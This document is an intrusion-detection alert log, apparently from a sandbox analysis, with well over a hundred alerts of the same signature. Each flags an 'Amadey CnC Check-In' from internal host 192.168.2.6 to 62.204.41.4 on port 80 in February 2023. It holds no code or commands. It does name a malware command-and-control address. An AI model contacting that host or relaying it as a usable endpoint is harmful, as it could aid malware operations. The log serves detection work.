192.168.2.662.204.41.450365802027700 02/07/23-20:03:50.517630	TCP	2027700	ET TROJAN Amadey CnC Check-In	50365	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450074802027700 02/07/23-20:02:32.940709	TCP	2027700	ET TROJAN Amadey CnC Check-In	50074	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449924802027700 02/07/23-20:01:46.876099	TCP	2027700	ET TROJAN Amadey CnC Check-In	49924	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449939802027700 02/07/23-20:01:52.546117	TCP	2027700	ET TROJAN Amadey CnC Check-In	49939	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450273802027700 02/07/23-20:03:27.900257	TCP	2027700	ET TROJAN Amadey CnC Check-In	50273	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450329802027700 02/07/23-20:03:41.705909	TCP	2027700	ET TROJAN Amadey CnC Check-In	50329	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450059802027700 02/07/23-20:02:26.009359	TCP	2027700	ET TROJAN Amadey CnC Check-In	50059	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449746802027700 02/07/23-20:00:57.646912	TCP	2027700	ET TROJAN Amadey CnC Check-In	49746	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450224802027700 02/07/23-20:03:13.408043	TCP	2027700	ET TROJAN Amadey CnC Check-In	50224	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449865802027700 02/07/23-20:01:30.873059	TCP	2027700	ET TROJAN Amadey CnC Check-In	49865	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449824802027700 02/07/23-20:01:18.327900	TCP	2027700	ET TROJAN Amadey CnC Check-In	49824	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450005802027700 02/07/23-20:02:12.152880	TCP	2027700	ET TROJAN Amadey CnC Check-In	50005	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450187802027700 02/07/23-20:03:04.340649	TCP	2027700	ET TROJAN Amadey CnC Check-In	50187	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449995802027700 02/07/23-20:02:09.662326	TCP	2027700	ET TROJAN Amadey CnC Check-In	49995	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449784802027700 02/07/23-20:01:06.918802	TCP	2027700	ET TROJAN Amadey CnC Check-In	49784	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450146802027700 02/07/23-20:02:54.625344	TCP	2027700	ET TROJAN Amadey CnC Check-In	50146	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450265802027700 02/07/23-20:03:25.941004	TCP	2027700	ET TROJAN Amadey CnC Check-In	50265	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450443802027700 02/07/23-20:04:09.644630	TCP	2027700	ET TROJAN Amadey CnC Check-In	50443	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450402802027700 02/07/23-20:03:59.613926	TCP	2027700	ET TROJAN Amadey CnC Check-In	50402	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449759802027700 02/07/23-20:01:00.829527	TCP	2027700	ET TROJAN Amadey CnC Check-In	49759	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450087802027700 02/07/23-20:02:36.507624	TCP	2027700	ET TROJAN Amadey CnC Check-In	50087	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450290802027700 02/07/23-20:03:32.058144	TCP	2027700	ET TROJAN Amadey CnC Check-In	50290	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450378802027700 02/07/23-20:03:53.744252	TCP	2027700	ET TROJAN Amadey CnC Check-In	50378	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449978802027700 02/07/23-20:02:01.964465	TCP	2027700	ET TROJAN Amadey CnC Check-In	49978	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449890802027700 02/07/23-20:01:36.846820	TCP	2027700	ET TROJAN Amadey CnC Check-In	49890	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450159802027700 02/07/23-20:02:57.764941	TCP	2027700	ET TROJAN Amadey CnC Check-In	50159	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450118802027700 02/07/23-20:02:44.402579	TCP	2027700	ET TROJAN Amadey CnC Check-In	50118	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450337802027700 02/07/23-20:03:43.661817	TCP	2027700	ET TROJAN Amadey CnC Check-In	50337	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449937802027700 02/07/23-20:01:52.063127	TCP	2027700	ET TROJAN Amadey CnC Check-In	49937	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450046802027700 02/07/23-20:02:22.274271	TCP	2027700	ET TROJAN Amadey CnC Check-In	50046	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449718802027700 02/07/23-20:00:50.878461	TCP	2027700	ET TROJAN Amadey CnC Check-In	49718	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450260802027700 02/07/23-20:03:22.605985	TCP	2027700	ET TROJAN Amadey CnC Check-In	50260	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450306802027700 02/07/23-20:03:36.017602	TCP	2027700	ET TROJAN Amadey CnC Check-In	50306	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450300802027700 02/07/23-20:03:34.563838	TCP	2027700	ET TROJAN Amadey CnC Check-In	50300	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450211802027700 02/07/23-20:03:10.237661	TCP	2027700	ET TROJAN Amadey CnC Check-In	50211	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450122802027700 02/07/23-20:02:45.389628	TCP	2027700	ET TROJAN Amadey CnC Check-In	50122	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450474802027700 02/07/23-20:04:17.216226	TCP	2027700	ET TROJAN Amadey CnC Check-In	50474	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449794802027700 02/07/23-20:01:11.263709	TCP	2027700	ET TROJAN Amadey CnC Check-In	49794	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449766802027700 02/07/23-20:01:02.341785	TCP	2027700	ET TROJAN Amadey CnC Check-In	49766	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449944802027700 02/07/23-20:01:53.792362	TCP	2027700	ET TROJAN Amadey CnC Check-In	49944	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449855802027700 02/07/23-20:01:26.978024	TCP	2027700	ET TROJAN Amadey CnC Check-In	49855	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449883802027700 02/07/23-20:01:35.109836	TCP	2027700	ET TROJAN Amadey CnC Check-In	49883	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449962802027700 02/07/23-20:01:58.212789	TCP	2027700	ET TROJAN Amadey CnC Check-In	49962	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450296802027700 02/07/23-20:03:33.595122	TCP	2027700	ET TROJAN Amadey CnC Check-In	50296	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450033802027700 02/07/23-20:02:19.127549	TCP	2027700	ET TROJAN Amadey CnC Check-In	50033	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449873802027700 02/07/23-20:01:32.847820	TCP	2027700	ET TROJAN Amadey CnC Check-In	49873	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450385802027700 02/07/23-20:03:55.477920	TCP	2027700	ET TROJAN Amadey CnC Check-In	50385	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450039802027700 02/07/23-20:02:20.584895	TCP	2027700	ET TROJAN Amadey CnC Check-In	50039	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450128802027700 02/07/23-20:02:48.244683	TCP	2027700	ET TROJAN Amadey CnC Check-In	50128	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450140802027700 02/07/23-20:02:53.167783	TCP	2027700	ET TROJAN Amadey CnC Check-In	50140	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450217802027700 02/07/23-20:03:11.704054	TCP	2027700	ET TROJAN Amadey CnC Check-In	50217	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450051802027700 02/07/23-20:02:23.494295	TCP	2027700	ET TROJAN Amadey CnC Check-In	50051	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450095802027700 02/07/23-20:02:38.620537	TCP	2027700	ET TROJAN Amadey CnC Check-In	50095	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449738802027700 02/07/23-20:00:55.702188	TCP	2027700	ET TROJAN Amadey CnC Check-In	49738	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450184802027700 02/07/23-20:03:03.616190	TCP	2027700	ET TROJAN Amadey CnC Check-In	50184	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450227802027700 02/07/23-20:03:14.108353	TCP	2027700	ET TROJAN Amadey CnC Check-In	50227	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449804802027700 02/07/23-20:01:13.672357	TCP	2027700	ET TROJAN Amadey CnC Check-In	49804	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450316802027700 02/07/23-20:03:38.501751	TCP	2027700	ET TROJAN Amadey CnC Check-In	50316	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450357802027700 02/07/23-20:03:48.563249	TCP	2027700	ET TROJAN Amadey CnC Check-In	50357	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450446802027700 02/07/23-20:04:10.384849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50446	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450405802027700 02/07/23-20:04:00.344097	TCP	2027700	ET TROJAN Amadey CnC Check-In	50405	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449916802027700 02/07/23-20:01:43.294683	TCP	2027700	ET TROJAN Amadey CnC Check-In	49916	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449934802027700 02/07/23-20:01:51.338963	TCP	2027700	ET TROJAN Amadey CnC Check-In	49934	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449827802027700 02/07/23-20:01:19.034168	TCP	2027700	ET TROJAN Amadey CnC Check-In	49827	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449756802027700 02/07/23-20:01:00.094396	TCP	2027700	ET TROJAN Amadey CnC Check-In	49756	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449893802027700 02/07/23-20:01:37.604134	TCP	2027700	ET TROJAN Amadey CnC Check-In	49893	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450156802027700 02/07/23-20:02:57.043867	TCP	2027700	ET TROJAN Amadey CnC Check-In	50156	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450280802027700 02/07/23-20:03:29.633131	TCP	2027700	ET TROJAN Amadey CnC Check-In	50280	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449845802027700 02/07/23-20:01:23.372817	TCP	2027700	ET TROJAN Amadey CnC Check-In	49845	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450061802027700 02/07/23-20:02:27.765974	TCP	2027700	ET TROJAN Amadey CnC Check-In	50061	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450150802027700 02/07/23-20:02:55.620345	TCP	2027700	ET TROJAN Amadey CnC Check-In	50150	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449982802027700 02/07/23-20:02:02.953057	TCP	2027700	ET TROJAN Amadey CnC Check-In	49982	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450268802027700 02/07/23-20:03:26.680608	TCP	2027700	ET TROJAN Amadey CnC Check-In	50268	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450067802027700 02/07/23-20:02:31.198973	TCP	2027700	ET TROJAN Amadey CnC Check-In	50067	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450197802027700 02/07/23-20:03:06.840701	TCP	2027700	ET TROJAN Amadey CnC Check-In	50197	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450423802027700 02/07/23-20:04:04.774413	TCP	2027700	ET TROJAN Amadey CnC Check-In	50423	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450179802027700 02/07/23-20:03:02.638946	TCP	2027700	ET TROJAN Amadey CnC Check-In	50179	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450464802027700 02/07/23-20:04:14.739715	TCP	2027700	ET TROJAN Amadey CnC Check-In	50464	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450138802027700 02/07/23-20:02:52.674592	TCP	2027700	ET TROJAN Amadey CnC Check-In	50138	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450286802027700 02/07/23-20:03:31.095393	TCP	2027700	ET TROJAN Amadey CnC Check-In	50286	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450049802027700 02/07/23-20:02:23.003141	TCP	2027700	ET TROJAN Amadey CnC Check-In	50049	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450245802027700 02/07/23-20:03:18.483828	TCP	2027700	ET TROJAN Amadey CnC Check-In	50245	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450334802027700 02/07/23-20:03:42.924733	TCP	2027700	ET TROJAN Amadey CnC Check-In	50334	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450375802027700 02/07/23-20:03:53.005630	TCP	2027700	ET TROJAN Amadey CnC Check-In	50375	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449817802027700 02/07/23-20:01:16.563418	TCP	2027700	ET TROJAN Amadey CnC Check-In	49817	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450436802027700 02/07/23-20:04:07.968971	TCP	2027700	ET TROJAN Amadey CnC Check-In	50436	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449906802027700 02/07/23-20:01:40.847690	TCP	2027700	ET TROJAN Amadey CnC Check-In	49906	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449728802027700 02/07/23-20:00:53.301055	TCP	2027700	ET TROJAN Amadey CnC Check-In	49728	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450344802027700 02/07/23-20:03:45.384589	TCP	2027700	ET TROJAN Amadey CnC Check-In	50344	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450433802027700 02/07/23-20:04:07.254488	TCP	2027700	ET TROJAN Amadey CnC Check-In	50433	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450191802027700 02/07/23-20:03:05.327791	TCP	2027700	ET TROJAN Amadey CnC Check-In	50191	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449988802027700 02/07/23-20:02:04.410732	TCP	2027700	ET TROJAN Amadey CnC Check-In	49988	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449903802027700 02/07/23-20:01:40.097751	TCP	2027700	ET TROJAN Amadey CnC Check-In	49903	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449725802027700 02/07/23-20:00:52.567467	TCP	2027700	ET TROJAN Amadey CnC Check-In	49725	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449896802027700 02/07/23-20:01:38.330966	TCP	2027700	ET TROJAN Amadey CnC Check-In	49896	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449985802027700 02/07/23-20:02:03.672175	TCP	2027700	ET TROJAN Amadey CnC Check-In	49985	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449814802027700 02/07/23-20:01:15.831910	TCP	2027700	ET TROJAN Amadey CnC Check-In	49814	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450169802027700 02/07/23-20:03:00.200665	TCP	2027700	ET TROJAN Amadey CnC Check-In	50169	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450166802027700 02/07/23-20:02:59.478159	TCP	2027700	ET TROJAN Amadey CnC Check-In	50166	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449750802027700 02/07/23-20:00:58.621945	TCP	2027700	ET TROJAN Amadey CnC Check-In	49750	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449899802027700 02/07/23-20:01:39.123661	TCP	2027700	ET TROJAN Amadey CnC Check-In	49899	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450270802027700 02/07/23-20:03:27.172191	TCP	2027700	ET TROJAN Amadey CnC Check-In	50270	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450255802027700 02/07/23-20:03:20.983533	TCP	2027700	ET TROJAN Amadey CnC Check-In	50255	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450077802027700 02/07/23-20:02:33.659592	TCP	2027700	ET TROJAN Amadey CnC Check-In	50077	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450010802027700 02/07/23-20:02:13.422325	TCP	2027700	ET TROJAN Amadey CnC Check-In	50010	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450258802027700 02/07/23-20:03:21.947679	TCP	2027700	ET TROJAN Amadey CnC Check-In	50258	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450347802027700 02/07/23-20:03:46.099227	TCP	2027700	ET TROJAN Amadey CnC Check-In	50347	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450449802027700 02/07/23-20:04:11.130604	TCP	2027700	ET TROJAN Amadey CnC Check-In	50449	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450420802027700 02/07/23-20:04:04.035367	TCP	2027700	ET TROJAN Amadey CnC Check-In	50420	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449919802027700 02/07/23-20:01:44.090733	TCP	2027700	ET TROJAN Amadey CnC Check-In	49919	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449931802027700 02/07/23-20:01:50.612148	TCP	2027700	ET TROJAN Amadey CnC Check-In	49931	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449801802027700 02/07/23-20:01:12.934086	TCP	2027700	ET TROJAN Amadey CnC Check-In	49801	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449842802027700 02/07/23-20:01:22.668685	TCP	2027700	ET TROJAN Amadey CnC Check-In	49842	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450023802027700 02/07/23-20:02:16.679938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50023	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450372802027700 02/07/23-20:03:52.297867	TCP	2027700	ET TROJAN Amadey CnC Check-In	50372	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449753802027700 02/07/23-20:00:59.355095	TCP	2027700	ET TROJAN Amadey CnC Check-In	49753	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450153802027700 02/07/23-20:02:56.341247	TCP	2027700	ET TROJAN Amadey CnC Check-In	50153	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450242802027700 02/07/23-20:03:17.764359	TCP	2027700	ET TROJAN Amadey CnC Check-In	50242	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450461802027700 02/07/23-20:04:14.005420	TCP	2027700	ET TROJAN Amadey CnC Check-In	50461	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450331802027700 02/07/23-20:03:42.173293	TCP	2027700	ET TROJAN Amadey CnC Check-In	50331	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450194802027700 02/07/23-20:03:06.078733	TCP	2027700	ET TROJAN Amadey CnC Check-In	50194	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450201802027700 02/07/23-20:03:07.797561	TCP	2027700	ET TROJAN Amadey CnC Check-In	50201	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450408802027700 02/07/23-20:04:01.096954	TCP	2027700	ET TROJAN Amadey CnC Check-In	50408	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450112802027700 02/07/23-20:02:42.895840	TCP	2027700	ET TROJAN Amadey CnC Check-In	50112	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450283802027700 02/07/23-20:03:30.376799	TCP	2027700	ET TROJAN Amadey CnC Check-In	50283	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450064802027700 02/07/23-20:02:30.633740	TCP	2027700	ET TROJAN Amadey CnC Check-In	50064	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450319802027700 02/07/23-20:03:39.222800	TCP	2027700	ET TROJAN Amadey CnC Check-In	50319	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449843802027700 02/07/23-20:01:22.907370	TCP	2027700	ET TROJAN Amadey CnC Check-In	49843	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450110802027700 02/07/23-20:02:42.417578	TCP	2027700	ET TROJAN Amadey CnC Check-In	50110	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450171802027700 02/07/23-20:03:00.685944	TCP	2027700	ET TROJAN Amadey CnC Check-In	50171	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450364802027700 02/07/23-20:03:50.279050	TCP	2027700	ET TROJAN Amadey CnC Check-In	50364	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450462802027700 02/07/23-20:04:14.252136	TCP	2027700	ET TROJAN Amadey CnC Check-In	50462	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450012802027700 02/07/23-20:02:13.968224	TCP	2027700	ET TROJAN Amadey CnC Check-In	50012	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450073802027700 02/07/23-20:02:32.709344	TCP	2027700	ET TROJAN Amadey CnC Check-In	50073	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449999802027700 02/07/23-20:02:10.659483	TCP	2027700	ET TROJAN Amadey CnC Check-In	49999	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450459802027700 02/07/23-20:04:13.538198	TCP	2027700	ET TROJAN Amadey CnC Check-In	50459	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449745802027700 02/07/23-20:00:57.394746	TCP	2027700	ET TROJAN Amadey CnC Check-In	49745	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449941802027700 02/07/23-20:01:53.041040	TCP	2027700	ET TROJAN Amadey CnC Check-In	49941	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450401802027700 02/07/23-20:03:59.377764	TCP	2027700	ET TROJAN Amadey CnC Check-In	50401	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450009802027700 02/07/23-20:02:13.165566	TCP	2027700	ET TROJAN Amadey CnC Check-In	50009	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450107802027700 02/07/23-20:02:41.686560	TCP	2027700	ET TROJAN Amadey CnC Check-In	50107	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450205802027700 02/07/23-20:03:08.738599	TCP	2027700	ET TROJAN Amadey CnC Check-In	50205	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450303802027700 02/07/23-20:03:35.307803	TCP	2027700	ET TROJAN Amadey CnC Check-In	50303	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450168802027700 02/07/23-20:02:59.953138	TCP	2027700	ET TROJAN Amadey CnC Check-In	50168	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449938802027700 02/07/23-20:01:52.305588	TCP	2027700	ET TROJAN Amadey CnC Check-In	49938	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450266802027700 02/07/23-20:03:26.196925	TCP	2027700	ET TROJAN Amadey CnC Check-In	50266	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450299802027700 02/07/23-20:03:34.321474	TCP	2027700	ET TROJAN Amadey CnC Check-In	50299	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449778802027700 02/07/23-20:01:04.997293	TCP	2027700	ET TROJAN Amadey CnC Check-In	49778	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449815802027700 02/07/23-20:01:16.077954	TCP	2027700	ET TROJAN Amadey CnC Check-In	49815	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449871802027700 02/07/23-20:01:32.342194	TCP	2027700	ET TROJAN Amadey CnC Check-In	49871	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449773802027700 02/07/23-20:01:04.038338	TCP	2027700	ET TROJAN Amadey CnC Check-In	49773	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449913802027700 02/07/23-20:01:42.565044	TCP	2027700	ET TROJAN Amadey CnC Check-In	49913	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449974802027700 02/07/23-20:02:00.945242	TCP	2027700	ET TROJAN Amadey CnC Check-In	49974	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450241802027700 02/07/23-20:03:17.535341	TCP	2027700	ET TROJAN Amadey CnC Check-In	50241	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449876802027700 02/07/23-20:01:33.586090	TCP	2027700	ET TROJAN Amadey CnC Check-In	49876	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450143802027700 02/07/23-20:02:53.873531	TCP	2027700	ET TROJAN Amadey CnC Check-In	50143	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449720802027700 02/07/23-20:00:51.202653	TCP	2027700	ET TROJAN Amadey CnC Check-In	49720	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450045802027700 02/07/23-20:02:22.023470	TCP	2027700	ET TROJAN Amadey CnC Check-In	50045	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450397802027700 02/07/23-20:03:58.395001	TCP	2027700	ET TROJAN Amadey CnC Check-In	50397	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450037802027700 02/07/23-20:02:20.092570	TCP	2027700	ET TROJAN Amadey CnC Check-In	50037	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450233802027700 02/07/23-20:03:15.578132	TCP	2027700	ET TROJAN Amadey CnC Check-In	50233	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449781802027700 02/07/23-20:01:05.723794	TCP	2027700	ET TROJAN Amadey CnC Check-In	49781	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450392802027700 02/07/23-20:03:57.167562	TCP	2027700	ET TROJAN Amadey CnC Check-In	50392	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450434802027700 02/07/23-20:04:07.488023	TCP	2027700	ET TROJAN Amadey CnC Check-In	50434	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449868802027700 02/07/23-20:01:31.598757	TCP	2027700	ET TROJAN Amadey CnC Check-In	49868	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450196802027700 02/07/23-20:03:06.562601	TCP	2027700	ET TROJAN Amadey CnC Check-In	50196	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450238802027700 02/07/23-20:03:16.812392	TCP	2027700	ET TROJAN Amadey CnC Check-In	50238	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450406802027700 02/07/23-20:04:00.598596	TCP	2027700	ET TROJAN Amadey CnC Check-In	50406	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449740802027700 02/07/23-20:00:56.170997	TCP	2027700	ET TROJAN Amadey CnC Check-In	49740	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449810802027700 02/07/23-20:01:15.107347	TCP	2027700	ET TROJAN Amadey CnC Check-In	49810	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449851802027700 02/07/23-20:01:24.881497	TCP	2027700	ET TROJAN Amadey CnC Check-In	49851	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449946802027700 02/07/23-20:01:54.317743	TCP	2027700	ET TROJAN Amadey CnC Check-In	49946	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450311802027700 02/07/23-20:03:37.282022	TCP	2027700	ET TROJAN Amadey CnC Check-In	50311	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450274802027700 02/07/23-20:03:28.142137	TCP	2027700	ET TROJAN Amadey CnC Check-In	50274	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450470802027700 02/07/23-20:04:16.255518	TCP	2027700	ET TROJAN Amadey CnC Check-In	50470	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450020802027700 02/07/23-20:02:15.924236	TCP	2027700	ET TROJAN Amadey CnC Check-In	50020	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450078802027700 02/07/23-20:02:33.896004	TCP	2027700	ET TROJAN Amadey CnC Check-In	50078	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449905802027700 02/07/23-20:01:40.596381	TCP	2027700	ET TROJAN Amadey CnC Check-In	49905	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450369802027700 02/07/23-20:03:51.539852	TCP	2027700	ET TROJAN Amadey CnC Check-In	50369	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450115802027700 02/07/23-20:02:43.638524	TCP	2027700	ET TROJAN Amadey CnC Check-In	50115	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450328802027700 02/07/23-20:03:41.453966	TCP	2027700	ET TROJAN Amadey CnC Check-In	50328	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450439802027700 02/07/23-20:04:08.690442	TCP	2027700	ET TROJAN Amadey CnC Check-In	50439	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450246802027700 02/07/23-20:03:18.721408	TCP	2027700	ET TROJAN Amadey CnC Check-In	50246	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449900802027700 02/07/23-20:01:39.360455	TCP	2027700	ET TROJAN Amadey CnC Check-In	49900	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450148802027700 02/07/23-20:02:55.124323	TCP	2027700	ET TROJAN Amadey CnC Check-In	50148	80	192.168.2.6	62.204.41.4
